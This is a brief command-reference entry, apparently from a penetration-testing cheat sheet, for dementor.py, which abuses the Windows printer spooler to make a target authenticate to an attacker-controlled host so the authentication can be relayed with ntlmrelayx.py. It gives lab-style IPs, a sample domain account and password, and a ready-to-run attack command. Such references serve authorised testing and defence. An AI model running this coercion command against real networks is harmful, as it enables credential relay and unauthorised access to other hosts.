dementor.py interacts with the printer spooler on a host to trigger an authentication from the target IP to an attacker controlled host (usually an SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts. See more in ntlmrelayx.py.
Command Reference:
Target IP: 10.10.10.1
Attacker IP: 10.10.10.2
Domain: test.local
Username: test
Password: Welkom01!
python3 dementor.py -u test -p Welkom01! -d test.local 10.10.10.2 10.10.10.1